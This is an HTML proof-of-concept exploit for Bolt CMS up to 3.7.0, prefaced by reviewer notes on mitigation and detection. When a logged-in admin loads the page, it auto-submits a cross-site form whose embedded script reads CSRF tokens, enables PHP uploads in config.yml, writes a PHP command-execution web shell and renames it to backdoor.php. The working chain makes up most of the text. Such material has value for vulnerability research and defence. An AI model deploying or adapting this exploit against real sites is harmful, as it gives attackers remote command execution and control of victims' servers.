<!--
Vendor: Bolt CMS
Version: <= 3.7.0
CVE: CVE-2020-4040, CVE-2020-4041
Vulnerabilities: CSRF, XSS, RCE
Written by Sivanesh Ashok | @sivaneshashok | stazot.com
For more details, visit https://stazot.com
This is an RCE poc for Bolt CMS <= 3.7.0. When the admin of Bolt CMS visits the page that hosts this code, backdoor.php gets uploaded and can be used as
http://targetbolt.site/files/backdoor.php?cmd={insert_command_here}
-->
<!--
Reviewer notes (defensive reading of this proof of concept):

How the chain fits together, as far as this file shows it:
  1. The form below is auto-submitted by the script at the bottom of the page, so simply
     loading this page in a browser that holds a Bolt admin session sends a cross-site POST
     to /preview/page. The form carries no anti-CSRF token field at all (only contenttype,
     title, slug, teaser, body and id), which is the CSRF half of the issue.
  2. The "body" textarea is the payload: its content is a script block that the PoC expects
     the preview response to render unescaped inside the Bolt origin (the XSS half).
     Everything between the textarea tags is submitted verbatim, so it is payload text,
     not markup of this page, and none of it is a comment of this page.
  3. Once it runs same-origin, the embedded script fetches admin pages with $.get and reads
     the per-form CSRF tokens out of the returned HTML (the #file_edit__token inputs and the
     value read via .data().action from the file-listing dropdown). After the first request
     it calls $.ajaxSetup({async: false}), so the remaining requests run synchronously and
     in order. Per-form CSRF tokens give no protection against script that already executes
     in the application's own origin; they only protect against the initial cross-site post.
  4. With those tokens it edits config.yml to append "php" to accept_file_types, creates
     backdoor.txt, writes a PHP command-execution stub into it, and renames it through
     /async/file/rename to "backdoor.php\." (the trailing backslash-dot is presumably what
     gets the rename past the extension check; how the stored name ends up is not shown here).

Mitigation points a defender should take from this file:
  - Require and verify the CSRF token on the preview endpoint exactly as on the other admin
    POST handlers; the PoC depends on /preview/page accepting a token-less POST.
  - Treat content rendered in the admin preview as untrusted HTML (escape or sanitise it),
    and serve the back office with a Content-Security-Policy whose script-src does not allow
    inline scripts or arbitrary CDNs; either measure stops the embedded script from running.
  - Validate the target name on rename with the same rules as on upload, after normalising
    trailing dots and backslashes, and do not let the in-browser config editor add
    executable extensions to accept_file_types without an explicit re-authentication step.
  - The header states "<= 3.7.0" as the affected range; run a later release.

Detection ideas (server side): config.yml edits that introduce "php" in accept_file_types,
/async/file/create followed by /async/file/rename with a new name containing ".php", web
requests to /files/*.php carrying a "cmd" parameter, and admin POSTs whose Origin or Referer
is not the Bolt host.
-->
<html>
<body>
<!-- change http://localhost to the target domain -->
<!-- Auto-submitted CSRF form. There is no _token field, so the request is accepted on the
     strength of the victim's session cookie alone; the script at the end of the page clicks
     #submitbutton as soon as the DOM is ready. -->
<form id="csrfform" method="POST" action="http://localhost/preview/page">
<input type=hidden name="contenttype" value="pages">
<input type=hidden name="title" value="Preview Page">
<input type=hidden name="slug" value="previewpage1">
<input type=hidden name="teaser" value="This is just a preview page">
<!-- The textarea content, up to the closing tag, is the submitted "body" field (the XSS
     payload). It is raw text as far as this page is concerned and is left untouched. -->
<textarea type=hidden name="body">
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
<!-- javascript exploit starts here -->
<script>
// BoltCMS <= 3.7.0 RCE
// Written by Sivanesh Ashok | @sivaneshashok | stazot.com
// change "http://localhost" to the respective Bolt CMS domain
var target = 'http://localhost';
//change "/bolt" to your admin dashboard
var admin_url = '/bolt';
// edit config.yml to add php to acceptable file types
$.get(target+admin_url+'/file/edit/config/config.yml', function( my_var0 ) {
var tokenobj0 = $(my_var0).find('#file_edit__token');
var configfile = $(my_var0).find("#file_edit_contents")[0].defaultValue;
var extensionsline = configfile.match("accept_file_types: (.*)]");
var editedconfigfile = configfile.replace(extensionsline[0], "accept_file_types: "+extensionsline[1]+", php ]");
$.ajax({
type: 'POST',
url: target+admin_url+'/file/edit/config/config.yml?returnto=ajax',
data: {
'file_edit[_token]':tokenobj0[0].value,
'file_edit[contents]':editedconfigfile,
'file_edit[save]':'undefined'
}
});
}, 'html');
$.ajaxSetup({async: false});
// create backdoor.txt
// change the name backdoor.txt below if you think that it could be present already
$.get(target+admin_url+"/files", function( my_var1 ) {
var tokenobj1 = $(my_var1).find(".dropdown-menu.pull-right.hidden-xs").first().find("li:first-child").find("a:first-child").data().action.slice(22,-2).split(', ')[3].slice(1,-1);
$.ajax({
type: 'POST',
url: target+'/async/file/create',
data: {
'filename': 'backdoor.txt',
'parentPath': '',
'namespace': 'files',
'token': tokenobj1
}
});
}, 'html');
// edit backdoor.txt
$.get(target+admin_url+"/file/edit/files/backdoor.txt", function( my_var2 ) {
var tokenobj2 = $(my_var2).find("#file_edit__token")[0].defaultValue;
$.ajax({
type: 'POST',
url: target+admin_url+'/file/edit/files/backdoor.txt?returnto=ajax',
data: {
'file_edit[_token]': tokenobj2,
'file_edit[contents]': `<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>`,
'file_edit[save]': 'undefined'
}
});
}, 'html');
// rename backdoor.txt to backdoor.php\.
$.get(target+admin_url+"/files", function( my_var3 ) {
var tokenobj3 = $(my_var3).find(".dropdown-menu.pull-right.hidden-xs").first().find("li:first-child").find("a:first-child").data().action.slice(22,-2).split(', ')[3].slice(1,-1);
$.ajax({
type: 'POST',
url: target+'/async/file/rename',
data: {
'namespace': 'files',
'parent': '',
'oldname': 'backdoor.txt',
'newname': 'backdoor.php\\.',
'token': tokenobj3
}
});
}, 'html');
</script>
<!-- javascript exploit ends here -->
</textarea>
<input type=hidden name="id" value="1337">
<!-- Submit control; never clicked by a human, the script below triggers it on load. -->
<input type=submit value=submit id="submitbutton">
</form>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
<script type="text/javascript">
// Fire the cross-site POST as soon as the DOM is ready; no user interaction is required,
// which is why a CSRF token on the preview endpoint is the first line of defence.
$(function() {
$('#submitbutton').click();
});
</script>
</body>
</html>